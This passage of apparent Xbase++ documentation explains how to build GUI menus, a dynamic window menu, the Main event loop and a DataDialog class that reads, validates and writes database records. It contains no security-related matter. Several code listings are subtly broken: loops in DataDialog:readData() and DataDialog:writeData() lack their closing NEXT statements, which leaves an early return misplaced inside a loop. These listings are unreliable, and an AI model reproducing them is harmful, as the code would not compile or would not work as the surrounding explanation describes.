The menu system of a GUI application plays a centrol role for program control. This menu must be created only once, generally within the function AppSys() prior to the first display of the application window. When the menu system is created within AppSys() or before the application window is displayed, the user does not see the construction of the menu system. The menu in the application window is already complete when the window is displayed for the first time.
The menu system consists of an XbpMenuBar object which manages the horizontal menu bar in the application window and several XbpMenu objects that are inserted in the menu bar as submenus. There are several ways to implement program control using menus. The simplest form is shown in the SDIMENU.PRG file (which presents an example SDI application). The most important steps are shown in the following code:
/* Call in AppSys() */
MenuCreate( oDlg:menuBar() )
********************************************************************
* Create menu system in the menu bar of the dialog
********************************************************************
PROCEDURE MenuCreate( oMenuBar )
LOCAL oMenu
// First sub-menu
//
oMenu := SubMenuNew( oMenuBar, "~File" )
oMenu:addItem( { "Options", } )
oMenu:addItem( MENUITEM_SEPARATOR )
oMenu:addItem( { "~Exit" , NIL } )
oMenu:itemSelected := ;
{|nItem,mp2,obj| MenuSelect(obj, 100+nItem) }
oMenuBar:addItem( {oMenu, NIL} )
// Second sub-menu -> customer data
//
oMenu := SubMenuNew( oMenuBar, "C~ustomer" )
oMenu:setName( CUST_MENU )
oMenu:addItem( { "~New" , NIL } )
oMenu:addItem( { "~Seek" , NIL } )
oMenu:addItem( { "~Change", NIL } )
oMenu:addItem( { "~Delete",NIL , 0, ;
XBPMENUBAR_MIA_DISABLED } )
oMenu:addItem( { "~Print" ,NIL , 0, ;
XBPMENUBAR_MIA_DISABLED } )
oMenu:itemSelected := ;
{|nItem,mp2,obj| MenuSelect(obj, 200+nItem) }
oMenuBar:addItem( {oMenu, NIL} )
/* And so forth... */
XbpMenu objects are created to contain the menu items. These submenus are created in the user-defined function SubMenuNew() (which is shown below), and menu items are attached to the submenus using the :addItem() method. A menu item is an array containing between two and four elements. In the simplest case the first element is the character string to be displayed as the menu item caption and the second element is NIL. Any character in the character string can be identified as a short-cut key by placing a tilde (~) in front of it. The second element is the code block to be executed when the menu item is selected by the user. In this example, instead of defining individual code blocks for each menu item a callback code block is defined for the entire submenu and the numeric position of the selected item and the menu object itself are passed to the selection routine MenuSelect(). In this routine a simple DO CASE...ENDCASE structure provides branching to the appropriate program module.
The second menu in the example is assigned a numeric ID (#define constant CUST_MENU) in the call to the method :setName(). This allows a specific XbpMenu object to be found later, since this value is found in the child list of the XbpMenuBar object which in turn is stored in the child list of the application window. The expression SetAppWindow():childFromName( CUST_MENU ) would provide a reference to this XbpMenu object. This can be used to make individual menu items temporarily unavailable (or available again) if this is desired in a specific program situation.
Inserting submenus into the main menu is done using the method :addItem() executed by the XbpMenuBar object. The title of a menu serves as text for the menu item. In the example program this text is set for a new submenu as follows:
********************************************************************
* Create sub-menu in a menu
********************************************************************
FUNCTION SubMenuNew( oMenu, cTitle )
LOCAL oSubMenu := XbpMenu():new( oMenu )
oSubMenu:title := cTitle
RETURN oSubMenu:create()
In this function the main menu (or the immediately higher menu) is provided as the parent of the submenu. Assigning the title must occur prior to the call of the method :create() for correct positioning:
The default help menu
Each application should have a "Help" menu item that generally includes the same set of menu items. In the example program, this help menu is created by a separate procedure which creates the default menu items. Program control is implemented by code blocks that are passed to the menu in the method :addItem(). In this case the callback code block :itemSelected is not used.
********************************************************************
* Create standard help menu
********************************************************************
PROCEDURE HelpMenu( oMenuBar )
LOCAL oMenu := SubMenuNew( oMenuBar, "~Help" )
oMenu:addItem( { "Help ~index", ;
{|| HelpObject():showHelpIndex() } } )
oMenu:addItem( { "~General help", ;
{|| HelpObject():showGeneralHelp() } } )
oMenu:addItem( { "~Using help", ;
{|| HelpObject():showHelp(IPFID_HELP_HELP) } } )
oMenu:addItem( { "~Keys help", ;
{|| HelpObject():showKeysHelp() } } )
oMenu:addItem( MENUITEM_SEPARATOR )
oMenu:addItem( { "~Product information", ;
{|| MsgBox("Xbase++ SDI Demo") } } )
oMenuBar:addItem( {oMenu, NIL} )
RETURN
The online help is managed by the XbpHelp object that is stored as a static variable in the user-defined function HelpObject(). This means it is always available when the function HelpObject() is called. Default help information can be called from the help menu by executing the XbpHelp object's methods provided for these purposes. A special method does not exist for the item "Using help". Here a #define constant is specified to the XbpHelp object that designates the numeric ID for the appropriate help window in the online help. The same ID must also be used in the IPF source code.
A dynamic menu for managing windows
In addition to the help menu that is available in both SDI and MDI applications, MDI applications have a second default menu that is used to bring different child windows of the MDI application to the front. The text in the title of each opened window appears as a menu item and selecting a menu item sets focus to the corresponding child window. This requires a dynamic approach to the menu, because the number of menu items corresponds to the number of open windows. A dynamic window menu is implemented for this purpose in the MDIMENU.PRG file (which is part of the source code for the MDIDEMO sample application). It is a good example of deriving new classes from an Xbase Part. To accomplish this, a way to easily determine the main menu of the application window (the parent window) is needed. The function AppMenu() is included in MDIDEMO.PRG for this purpose and returns the main menu of the application. There is also only one window menu per application so it can be stored in a STATIC variable. The function WinMenu() performs this task as shown in the following code:
********************************************************************
* Create menu to manage open windows
********************************************************************
FUNCTION WinMenu()
STATIC soMenu
IF soMenu == NIL
soMenu := WindowMenu():new():create( AppMenu() )
ENDIF
RETURN soMenu
The window menu is an instance of the class WindowMenu and receives the return value of AppMenu() as its parent. This means it is displayed as a submenu of the MDI application main menu. The user-defined class WindowMenu is derived from XbpMenu:
********************************************************************
* Menu class for management of open windows
********************************************************************
CLASS WindowMenu FROM XbpMenu
EXPORTED:
CLASS VAR windowStack
CLASS METHOD initClass
METHOD init, addItem, delItem, setItem
ENDCLASS
********************************************************************
// Stack for open dialog windows as class variable
//
CLASS METHOD WindowMenu:initClass
::windowStack := {}
RETURN self
The class variable :windowStack is declared to reference opened windows. The class method :initClass(), whose only task is to initialize the class variable with an empty array is also included. The four methods of the XbpMenu class are overloaded. The method :init() is executed immediately after the class method :new() terminates. The :init() method of the XbpMenu class must also be called in order to initialize the member variables implemented there:
********************************************************************
// Select a window via callback code block
//
METHOD WindowMenu:init( oParent, aPresParam, lVisible )
::xbpMenu:init( oParent, aPresParam, lVisible )
::title := "~Window"
::itemSelected := ;
{|nItem,mp2,obj| SetAppFocus( obj:windowStack[nItem] ) }
RETURN self
After the superclass is initialized, the menu title is assigned in :init(). A code block is assigned to the callback slot :itemSelected. This code block sets the focus to the window whose window title is selected from the menu. The numeric position of the selected menu item is passed to the code block as the parameter nItem and obj contains a reference to the menu object itself. Within this code block, the class variable :windowStack is accessed. :windowStack contains references to all the child windows of the MDI application. The selected window is passed to the function SetAppFocus() which sets it as the foreground window.
The last three methods of the window menu class allow menu items to be inserted, changed or deleted. These methods have the same names as methods of the XbpMenu class but the parameter passed to the methods are different. Instead of an array with between two and four elements, the passed parameter is an XbpDialog or XbpCrt object that is to receive focus if the menu item is selected.
********************************************************************
// Use title of the dialog window as text for menu item
//
METHOD WindowMenu:addItem( oDlg )
LOCAL cItem := oDlg:getTitle()
AAdd( ::windowStack, oDlg )
::xbpMenu:addItem( {cItem, NIL} )
IF ::numItems() == 1
::setParent():insItem( ::setParent():numItems(), {self, NIL} )
ENDIF
RETURN self
An opened window is passed to the :addItem() method. Within this method, the window is added to the class variable :windowStack and the window title is added as a menu item by passing it to the :addItem() method of the XbpMenu class. A special characteristic of the window menu is that it is only displayed in the main menu when at least one child window is open. Otherwise the "Window" menu item does not appear in the main menu. The window menu inserts itself as a menu item in its parent (the main menu) after the first time the method :addItem() is executed.
********************************************************************
// Transfer changed window title to menu item
//
METHOD WindowMenu:setItem( oDlg )
LOCAL aItem, i := AScan( ::windowStack, oDlg )
IF i == 0
::addItem( oDlg )
ELSE
aItem := ::xbpMenu:getItem(i)
aItem[1] := oDlg:getTitle()
::xbpMenu:setItem( i, aItem )
ENDIF
RETURN self
********************************************************************
// Delete dialog window from window stack and from menu
//
METHOD WindowMenu:delItem( oDlg )
LOCAL i := AScan( ::windowStack, oDlg )
LOCAL nPos := ::setParent():numItems()-1 // window menu is always
// next to last
IF i > 0
::xbpMenu:delItem( i )
ADel( ::windowStack, i )
Asize( ::windowStack, Len(::windowStack)-1)
IF ::numItems() == 0
::setParent():delItem( nPos )
ENDIF
ENDIF
RETURN self
The :setItem() method is used when the window title of an opened dialog window changes. This change must also be made in the menu item of the dynamic window menu. The :delItem() method is called when a dialog window is closed. This method removes the title of the dialog window from the window menu. If no child windows remain open, the window menu removes itself from the main menu (the parent) and the menu item "Window" is no longer visible.
After the application window including the menu system has been created in AppSys(), program execution continues in the Main procedure (assuming there is no other INIT PROCEDURE). At the start of the Main procedure all conditions required for an error free run of the GUI application should be checked. For example, this might include testing for the existence of all required files, creating index files that are not available and initialization of variables required throughout the application (PUBLIC variables). Retrieving configuration variables using the command RESTORE FROM should also generally occur within the Main procedure before the program goes into the event loop. The event loop performs the central task of the Main procedure. In this loop, events are retrieved and sent on to the addressee. The following program code is from the MDIDEMO.PRG file and shows some of what needs to be included in the Main procedure or in functions called by the Main procedure.
#include "Gra.ch"
#include "Xbp.ch"
#include "AppEvent.ch"
#include "Mdidemo.ch"
********************************************************************
* Main procedure and event loop
********************************************************************
PROCEDURE Main
LOCAL nEvent, mp1, mp2, oXbp
FIELD CUSTNO, LASTNAME, FIRSTNAME, PARTNO, PARTNAME
// Check index files and create them if not existing
IF ! AllFilesExist( { "CUSTA.NTX", "CUSTB.NTX", ;
"PARTA.NTX", "PARTB.NTX" } )
USE Customer EXCLUSIVE
INDEX ON CustNo TO CustA
INDEX ON Upper(LastName+Firstname) TO CustB
USE Parts EXCLUSIVE
INDEX ON Upper(PartNo) TO PartA
INDEX ON Upper(PartName) TO PartB
CLOSE DATABASE
ENDIF
SET DELETED ON
// Infinite loop. The program is terminated in AppQuit()
DO WHILE .T.
nEvent := AppEvent( @mp1, @mp2, @oXbp )
oXbp:handleEvent( nEvent, mp1, mp2 )
ENDDO
RETURN
********************************************************************
* Check if all files of the array 'aFiles' exist
********************************************************************
FUNCTION AllFilesExist( aFiles )
LOCAL lExist := .T., i:=0, imax := Len(aFiles)
DO WHILE ++i <= imax .AND. lExist
lExist := File( aFiles[i] )
ENDDO
RETURN lExist
In this example, the Main procedure simply tests whether all the index files exist and recreates the index files if any are not found. The existence of the files is tested in the function AllFilesExist(). When this is complete, the Main procedure enters an infinite loop that reads events from the queue using AppEvent() and sends them on to the addressee by calling the addressee's method :handleEvent().
Looking at this implementation, the inevitable question is: Where and how is the program terminated? The infinite loop in the Main procedure cannot be terminated based on its condition DO WHILE .T.. A separate routine is used to terminate the program. The code for this routine is shown below:
********************************************************************
* Routine to terminate the program
********************************************************************
PROCEDURE AppQuit()
LOCAL nButton
nButton := ConfirmBox( , ;
"Do you really want to quit ?", ;
"Quit", ;
XBPMB_YESNO , ;
XBPMB_QUESTION+XBPMB_APPMODAL+XBPMB_MOVEABLE )
IF nButton == XBPMB_RET_YES
COMMIT
CLOSE ALL
QUIT
ENDIF
RETURN
In the termination routine AppQuit(), confirmation that the program should actually be terminated is received from the user via the ConfirmBox() function. If the application is to be terminated, all data buffers are written back into the files and all database are closed using CLOSE ALL. The command QUIT then terminates the program. If the user does not confirm that the program should be terminated, the infinite loop in the Main procedure is continued.
It is generally recommended that the source code for a GUI application be broken down into three sections: program start, program execution and program end. The program start is contained in AppSys() and the program code executed within the Main procedure prior to the event loop. The event loop itself is the program execution. Often within this loop the program code that was generated in MenuCreate() during program start up is called by the menu system. Program termination occurs in the user defined procedure AppQuit(), where verification by the user can be requested and any data can be saved.
There are only two places in a program where the procedure AppQuit() is called. AppQuit() is generally called from a menu item and from a callback code block or from a callback method. The next two lines illustrate this:
oMenu:addItem( {"~Quit", {|| AppQuit() } } )
oDialog:close := {|| AppQuit() }
In the first line, AppQuit() is executed after a menu item is selected so there must obviously be a menu containing a menu item to terminate the application. The second line defines a callback code block for the dialog window to execute after the system menu icon of the dialog window is double clicked or the "Close" menu item is selected in the system menu of the window. Generally, the routine for terminating a GUI application should be available in the menu of the application as well as in response to the xbeP_Close event.
An important aspect in programming GUI applications is the connection between the elements of the dialog window and the DatabaseEngine. The link between a single dialog element and a single database field is created via the data code block contained in the instance variable :dataLink of the DataRef class that manages data. This mechanism is described in the section "DataRef() - The connection between XBP and DBE". A window generally contains several dialog elements that are linked to different database fields. Special situations can result that must be considered when programming GUI applications. The programmer must also remember that such an application is completely event driven. As soon as there is a menu system in a window, an exactly defined order of program execution is no longer assured since the user has control of the application rather than the programmer.
The two example applications SDIDEMO and MDIDEMO are provided as examples for GUI applications under Xbase++. The difficulties that arise in accessing databases are taken into account in different ways in these two programs. In SDIDEMO, a procedural approach is implemented and an object-oriented style is used in MDIDEMO. Both of these program examples solve the problem of non-modality of entry fields resulting from the event driven nature of a GUI application. The problems of non-modality are described by the questions: "When and how is data input validated?" and "When is data written to the database?". Since data entry fields can be activated with a mouse click, prevalidation (validation before data is entered) is not possible (after a mouse click an entry field has the input focus). This condition requires some consideration by programmers who have previously developed only under DOS without a mouse. Validating data in a GUI application can occur in the framework of postvalidation (validation after data is entered). The :validate() method in the DataRef class serves this purpose. If postvalidation fails, the method :undo() of the entry field (Xbase Part) should be called. In an event driven application, this is the only way to assure that no invalid data is written into the database.
However, the major task in programming GUI applications is generally not validating the data, but transferring the input data to the database. In the SDIDEMO and MDIDEMO example programs, the philosophy is used that the data needs to be written to the database when the record pointer is changed. All Xbase Parts have their own edit buffer to hold the modified data and the value to write into the database fields is stored in this edit buffer of each Xbase Part. For all of the database fields that can be changed within a dialog window, an Xbase Part must exist to store the value in its edit buffer. The following code fragment illustrates this:
oXbp := XbpSLE():new( oDlg:drawingArea,, {95,135}, {180,22} )
oXbp:bufferLength := 20
oXbp:dataLink := {|x| IIf( x==NIL, LASTNAME, LASTNAME := x ) }
oXbp:create():setData()
In this code, an entry field is created for editing the data in the database field LASTNAME. Calling the method :setdata() in connection with :create() copies the data from the database field into the edit buffer of the XbpSLE object. Within a dialog window any number of entry fields can exist to access database fields. The edit buffer of all entry fields in the dialog window can be changed at any time (a mouse click in an entry field is sufficient to begin editing). For this reason, it must be determined when changes to the data in an entry field will be copied back into the file. There are two approaches: changes to individual data entry fields are written into the file as soon as the change occurs or all changes from all data entry fields in a window are written into the file as soon as a "Save" routine is explicitly called or the record pointer is repositioned.
The second approach is preferred in GUI applications that are designed for simultaneous access on a network. This approach allows several data entry fields to be changed in a dialog window without each change being individually copied to the database. In concurrent or network operation saving each change to the database would require a time consuming lock and release of the current record. A performance optimized GUI application only locks a record when it can write several fields to the database or when the record pointer changes.
The problems of validating and saving data into databases is present in every application. The following code shows several aspects of this problem and is based on the example application MDIDEMO. In this example application the DataDialog class is used to provide dialog windows for accessing the DatabaseEngine. A DataDialog object coordinates a DatabaseEngine with a dialog window. The source code for this class is contained in the file DATADLG.PRG. An example of an input screen based on DataDialog, is shown in the following illustration:
The DataDialog class is derived from XbpDialog. It adds seven new instance variables and eleven additional methods for transferring data from a database to the dialog and vice versa. Three of the instance variables are for internal use only and are declared as PROTECTED:. The four methods :init(), :create(), :configure() and :destroy() perform steps in the "life cycle" of a DataDialog object:
#include "Gra.ch"
#include "Xbp.ch"
#include "Dmlb.ch"
#include "Common.ch"
#include "Appevent.ch"
********************************************************************
* Class declaration
********************************************************************
CLASS DataDialog FROM XbpDialog
PROTECTED:
VAR appendMode // Is it a new record?
VAR editControls // List of XBPs for editing data
VAR appendControls // List of XBPs enabled only
// during APPEND
EXPORTED:
VAR area READONLY // current work area
VAR newTitle // code block to change window title
VAR contextMenu // context menu for data dialog
VAR windowMenu // dynamic window menu in
// application window
METHOD init // overloaded methods
METHOD create
METHOD configure
METHOD destroy
METHOD addEditControl // register XBP for edit
METHOD addAppendControl // register XBP for append
METHOD notify // process DBO message
METHOD readData // read data from DBF
METHOD validateAll // validate all data stored in XBPs
METHOD writeData // write data from XBPs to DBF
METHOD isIndexUnique // check index value for uniqueness
ENDCLASS
The protected instance variable :appendMode contains the logical value .T. (true) only when the phantom data record (record number LastRec()+1) is current. The other two protected instance variables :editControls and :appendControls are arrays containing lists of Xbase Parts that can modify data. In order to create a data dialog, editable XBPs are required as well as Xbase Parts that cannot edit data but display static text or boxes (XbpStatic objects). The instance variable :editControls contains a list of references to those XBPs in the child list (all XBPs that are displayed in the dialog window are contained in this list) that can be edited.
The task of the :appendControls instance variable is similar and contains a list of XBPs that are only enabled when a new record is appended. In all other cases, these XBPs are disabled. They only display data and do not allow the data in them to be edited. This is useful for editing database fields that are contained in the primary database key which should not be changed once they are entered in the database. :editControls and :appendControls are both initialized with empty arrays. This is done in the :init() method after it calls the :init() method of the XbpDialog class as shown below:
********************************************************************
* Initialize data dialog
********************************************************************
METHOD DataDialog:init( oParent, oOwner , ;
aPos , aSize , ;
aPParam, lVisible )
DEFAULT lVisible TO .F.
::xbpDialog:init( oParent, oOwner, ;
aPos , aSize , ;
aPParam, lVisible )
::area := 0
::border := XBPDLG_THINBORDER
::maxButton := .F.
::editControls := {}
::appendControls := {}
::appendMode := .F.
::newTitle := {|obj| obj:getTitle() }
RETURN self
All instance variables are set to values with the valid data type in the :init() method. Only the instance variables :border and :maxButton change the default values assigned in the XbpDialog class. The window of a DataDialog object is fixed in size and cannot be enlarged. The method has the same parameter list as the method :new() and :init() in the XbpDialog class. This allows it to receive parameters and simply pass them on to the superclass. The DataDialog is different in that it is created as hidden by default. This is recommended when many XBPs will be displayed in the window after the window is generated. The construction of the screen with the method :show() is faster if everything can be displayed at once after the XBPs have been added to the dialog window.
The instance variable :newTitle must contain a code block that the DataDialog object is passed to. For this reason a code block is defined in the :init() method, but it must be redefined later. This code block changes the window title while the dialog window is visible. The default code block is assigned to the instance variable in the :init() method to ensure that the instance variable has the correct data type.
The next method in the "life cycle" of a DataDialog object is :create(). A database must be open in the current work area prior to this method being called. A DataDialog object continues to use the work area that is current when the :create() method is executed:
********************************************************************
* Load system resources
* Register DataDialog in current work area
********************************************************************
METHOD DataDialog:create( oParent, oOwner , ;
aPos , aSize , ;
aPParam, lVisible )
::xbpDialog:create( oParent, oOwner , ;
aPos , aSize , ;
aPParam, lVisible )
::drawingArea:setColorBG( GRA_CLR_PALEGRAY )
::appendMode := Eof()
::area := Select()
::close := {|mp1,mp2,obj| obj:destroy() }
::setDisplayFocus := {|mp1,mp2,obj| ;
DbSelectArea( obj:area ) }
DbRegisterClient( self )
RETURN self
The most important task of :create() is requesting system resources for the dialog window. This occurs when the method of the same name in the superclass is called and the parameters are simply passed on to it. The background color for the drawing area ( :drawingArea) of the dialog window is then set. The call to :setColorBG() also defines the background color for all XBPs later displayed in the dialog window. This affects all XBPs that have a caption for displaying text. This simplifies programming because the background color of the individual XBPs with captions do not have to be set separately. Generally when the system colors defined in the system configuration are to be used :setColorBG() cannot be called.
The lines that follow are important because they link the DataDialog object and the work area. First, whether the pointer is currently at Eof() is determined, then Select() determines the number of the current work area. Two code blocks are assigned to the callback slots :close and :setDisplayFocus. The method :destroy() (described below) is called after the xbeP_Close event. As soon as the DataDialog object receives focus, the code block in :setDisplayFocus is executed. In this code block, the work area managed by the DataDialog object is selected as the current work area using DbSelectArea(). This means that if the mouse is clicked in a DataDialog window, the correct work area is automatically selected.
The call to DbRegisterClient() is critical for the program logic. This registers the DataDialog object in the work area so that it is automatically notified whenever anything in the work area changes. This includes notification of changes in the position of the record pointer. When the record pointer changes, the new data must be displayed by the XBPs that are listed in the instance variable :editControls. This is done using the method :notify() which is described later after the remaining methods in the DataDialog "life cycle" are discussed. The method :configure() is provided to handle changes in the work area managed by the DataDialog object and is shown below:
********************************************************************
* Configure system resources
* Register data dialog in new work area if necessary
********************************************************************
METHOD DataDialog:configure( oParent, oOwner , ;
aPos , aSize , ;
aPParam, lVisible )
LOCAL lRegister := (::area <> Select())
::xbpDialog:configure( oParent, oOwner , ;
aPos , aSize , ;
aPParam, lVisible )
IF lRegister
(::area)->( DbDeRegisterClient( self ) )
ENDIF
::area := Select()
::appendMode := Eof()
IF lRegister
DbRegisterClient( self )
ENDIF
RETURN self
A DataDialog object always manipulates the current work area. Because of this, the method :configure() compares the instance variable :area to Select() to determine whether the current area has changed. If it has changed, the object is deregistered in the old work area and registered in the new area. In addition, the system resources for the dialog window are also reconfigured in the call to the :configure() method of the superclass.
The final method of the DataDialog life cycle is :destroy(). This method closes the database used by the DataDialog object and releases the system resources. The instance variables declared in the DataDialog class are reset to the values assigned in the method :init():
********************************************************************
* Release system resources and unregister data dialog from work area
********************************************************************
METHOD DataDialog:destroy()
::writeData()
::hide()
(::area)->( DbCloseArea() )
IF ! Empty( ::windowMenu )
::windowMenu:delItem( self ) // delete menu item in window menu
::windowMenu := NIL
ENDIF
IF ! Empty( ::contextMenu )
::contextMenu:cargo := NIL // Delete reference of data
::contextMenu := NIL // dialog and context menu
ENDIF
::xbpDialog:destroy() // release system resources
::Area := 0 // and set instance variables
::appendMode := .F. // to values corresponding to
::editControls := {} // :init() state
::appendControls := {}
::newTitle := {|obj| obj:getTitle() }
RETURN self
The method :writeData() is called in :destroy() in order to write all the data changes into the database before it is closed using DbCloseArea(). After the database is closed, the DataDialog object is implicitly deregistered from the work area and a call to DbDeRegisterClient() is not necessary. If a menu object is contained in the instance variable :windowMenu, the DataDialog object is removed from the list of menu items in this menu (the WindowMenu class is described in a previous section). The instance variable :contextMenu can contain a context menu that is activated by clicking the right mouse button. This mechanism is described in a later section. It is essential that the reference to the DataDialog object in the instance variable :cargo of the context menu be deleted because the method :destroy() is expected to eliminate all references to the DataDialog object. If a DataDialog object remains referenced anywhere, whether in a variable, an array, or an instance variable, it will not be removed from memory by the garbage collector. This concludes the discussion of the methods that perform tasks in the "life cycle" of a DataDialog object.
One of the most important method of the DataDialog class is the :notify() method. This method is called whenever something is changed in the work area associated with the object. An abbreviated version of this method highlighting its essential elements is shown below:
********************************************************************
* Notify method:
* - Write data to fields prior to moving the record pointer
* - Read data from fields after moving the record pointer
********************************************************************
METHOD DataDialog:notify( nEvent, mp1, mp2 )
IF nEvent <> xbeDBO_Notify // no notify message
RETURN self // ** return **
ENDIF
DO CASE
CASE mp1 == DBO_MOVE_PROLOG // record pointer is about
::writeData() // to be moved
CASE mp1 == DBO_MOVE_DONE .OR. ; // skip is done
mp1 == DBO_GOBOTTOM .OR. ;
mp1 == DBO_GOTOP
::readData()
ENDCASE
RETURN self
Calling the function DbRegisterClient() in the :create() method of the DataDialog object registers the object in the work area it uses. As soon as anything changes in this work area, the :notify() method is called. For record pointer movement, this method is called twice. The first time the DataDialog object receives the value represented by the constant DBO_MOVE_PROLOG (defined in the DMLB.CH file) as the mp1 parameter. This is a signal that means "Warning the record pointer position is about to change." When it receives this message, the DataDialog object executes the method :writeData() which writes the data of the current record into the database. In the second call to :notify(), the object receives the value of the constant DBO_MOVE_DONE. This message tells the object "Ok, the pointer has been changed." In response to this message, the object executes the :readData() method which copies the fields of the new record into the edit buffers of the XBPs that are in the data dialog's :editControls instance variable. This allows the data in the new record to be edited.
The :notify() method provides important program logic for the DataDialog object. In this method, the DataDialog object reacts to messages sent by the work area it uses. This method is only called after the object is registered in the work area using DbRegisterClient(). Or more precisely, it is only called when the object is registered in the database object (DBO) that manages the work area (a DBO is automatically created when a database is opened). Based on the event passed, the :notify() event determines whether a record should be read into XBPs or whether the data in the XBPs should be written into the database. The DataDialog object does not directly manage the data but does manage the XBPs contained in the array :editControls. Adding XBPs to this array is done using the method :addEditControl().
********************************************************************
* Add an edit control to internal list
********************************************************************
METHOD DataDialog:addEditControl( oXbp )
IF AScan( ::editControls, oXbp ) == 0
AAdd( ::editControls, oXbp )
ENDIF
RETURN self
********************************************************************
* Add an append control to internal list
********************************************************************
METHOD DataDialog:addAppendControl( oXbp )
IF AScan( ::appendControls, oXbp ) == 0
AAdd( ::appendControls, oXbp )
ENDIF
RETURN self
The two methods :addEditControl() and :addAppendControl() are almost identical. One adds an Xbase Part to an array stored in the instance variable :editControls and the other adds an Xbase Part to :appendControls. When a DataDialog object executes the method :readData() or :writeData(), it sequentially processes the elements in the :editControls array and sends each element (each Xbase Part) the message to read or write its data. A code fragment is included below to illustrate how Xbase Parts can be added to the window of a DataDialog object and to the :editControls instance variable if appropriate. The variable oDlg references a DataDialog object.
oXbp := XbpStatic():new( oDlg:drawingArea,, {5,135}, {80,22} )
oXbp:caption := "Lastname:" // static text is stored
oXbp:options := XBPSTATIC_TEXT_RIGHT // only in the child list
oXbp:create( )
oXbp := XbpSLE():new( oDlg:drawingArea,, {95,135}, {180,22} )
oXbp:bufferLength := 20 // entry field linked to
oXbp:tabStop := .T. // database
oXbp:dataLink := {|x| IIf( x==NIL, LASTNAME, LASTNAME := x ) }
oXbp:create():setData()
oDlg:addEditControl( oXbp ) // adds new XBP to :editControls
The Xbase Parts appear in the drawing area of a dialog window, so oDlg:drawingArea must be specified as the parent. The code fragment creates an XbpStatic object to display the text "Lastname:" and an XbpSLE object to access and edit the database field called LASTNAME. Passing the XbpSLE object to the method :addEditControl() adds this Xbase Part to the :editControls array. In the child list of the DataDialog object there are now two XBPs but the :editControls array contains only the XBP for data that can be edited. The methods :readData(), :validateAll() and :writeData() assume that all the Xbase Parts that can edit data are included in the :editControls array. The program code for :readData() is shown below:
********************************************************************
* Read current record and transfer data to edit controls
********************************************************************
METHOD DataDialog:readData()
LOCAL i, imax := Len( ::editControls )
FOR i:=1 TO imax // Transfer data from file
::editControls[i]:setData() // to XBPs
Eval( ::newTitle, self ) // Set new window title
IF Eof() // enable/disable XBPs
IF ! ::appendMode // active only during
imax := Len( ::appendControls ) // APPEND
FOR i:=1 TO imax //
::appendControls[i]:enable() // Hit Eof(), so
NEXT // enable XBPs
ENDIF
::appendMode := .T.
ELSEIF ::appendMode // Record pointer was
imax := Len( ::appendControls ) // moved from Eof() to
FOR i:=1 TO imax // an existing record.
::appendControls[i]:disable() // Disable append-only
NEXT // XBPs
::appendMode := .F.
ENDIF
RETURN
The :setData() method in the first FOR...NEXT loop causes all the XBPs referenced in the instance variable :editControls to re-read their edit buffers by copying the return value of the data code block contained in :dataLink into their edit buffer. The remaining code just enables and disables the XBPs in the :appendControls list. In addition to reading the data in the database fields, this method is the appropriate place to enable or disable those Xbase Parts that should only be edited when a new record is being appended.
The counterpart of :readData() is the :writeData() method. In this method, the data in the edit buffer of each Xbase Part listed in :editControls is written back to the database. This method involves relatively extensive program code, because it performs record locking and identifies whether a new record should be appended.
********************************************************************
* Write data from edit controls to file
********************************************************************
METHOD DataDialog:writeData()
LOCAL i, imax
LOCAL lLocked := .F. , ; // Is record locked?
lAppend := .F. , ; // Is record new?
aChanged := {} , ; // XBPs containing changed data
nOldArea := Select() // Current work area
dbSelectArea( ::area )
IF Eof() // Append a new record
IF ::validateAll() // Validate data first
APPEND BLANK
lAppend := .T.
aChanged := ::editControls // Test all possible changes
lLocked := ! NetErr() // Implicit lock
ELSE
MsgBox("Invalid data") // Do not write invalid data
DbSelectArea( nOldArea ) // to new record
RETURN .F. // *** RETURN ***
ENDIF
ELSE
imax := Len( ::editControls ) // Find all XBPs containing
FOR i:=1 TO imax // changed data
IF ::editControls[i]:changed
AAdd( aChanged, ::editControls[i] )
ENDIF
IF Empty( aChanged ) // Nothing has changed, so
DbSelectArea( nOldArea ) // no record lock necessary
RETURN .T. // *** RETURN ***
ENDIF
lLocked := DbRLock( Recno() ) // Lock current record
ENDIF
IF ! lLocked
MsgBox( "Record is currently locked" )
DbSelectArea( nOldArea ) // Record lock failed
RETURN .F. // *** RETURN ***
ENDIF
imax := Len( aChanged ) // Write access is necessary
FOR i:=1 TO imax // only for changed data
IF ! lAppend
IF ! aChanged[i]:validate()
aChanged[i]:undo() // invalid data !
LOOP // undo changes and validate
ENDIF // next XBP
ENDIF
aChanged[i]:getData() // Get data from XBP and
NEXT // write to file
DbCommit() // Commit file buffers
DbRUnlock( Recno() ) // Release record lock
IF ::appendMode // Disable append-only XBPs
imax := Len( ::appendControls ) // after APPEND
FOR i:=1 TO imax
::appendControls[i]:disable()
::appendMode := .F.
IF ! Empty( ::contextMenu )
::contextMenu:disableBottom()
::contextMenu:enableEof()
ENDIF
ENDIF
DbSelectArea( nOldArea )
RETURN .T.
Appending a new record requires special logic in the :writeData() method of the DataDialog object. A special empty record (the phantom record) is automatically available when the pointer is positioned at Eof(). If the pointer is positioned at Eof(), the method :readData() has copied "empty" values from the database fields into the XBP edit buffers for all of the XBPs listed in the instance variable :editControls. Because of this, all XBPs contain valid data types. But there is no guarantee that valid data is also contained in the edit buffers of each XBP. This means that data validation must be performed before the record is even appended. Since there is not yet a record, all the data to be saved is found only in the edit buffer of the corresponding Xbase Parts. The method :validateAll() is called before a new record is appended which is to receive data from the edit buffers of the Xbase Parts.
Data validation is especially important when a new record is appended because no previously valid data exists to allow the changes to the individual edit buffers to be voided. For records that are being edited, the method :undo() allows changes to the values in the edit buffers to be voided. But this approach assumes there is an original field value that is valid. This is only true if the record being edited existed prior to editing. When a record is appended, the original values are "empty" values which are probably not valid.
In :writeData(), this situation is handled by calling the method :validateAll() before the new record is appended to the file using APPEND BLANK. If data validation fails on even one field, a message box containing the text "Invalid data" is displayed and a new record is not appended. The invalid data remains in the edit buffers of the corresponding Xbase Parts ( :editControls) and can be corrected by the user. When an existing record is edited, data validation occurs individually for each Xbase Part. If the :validate() method of an XBP returns the value .F. (false) (indicating invalid data), the :undo() method of the XBP is executed which copies the original, valid data back into the edit buffer.
If any XBPs listed in :editControls have been changed, the record is locked using DbRLock(). After validation, data from the edit buffers is written into the database by calling the method :getData(). The function DbCommit() ensures that data in the file buffers are written into the database. Finally the record lock is released.
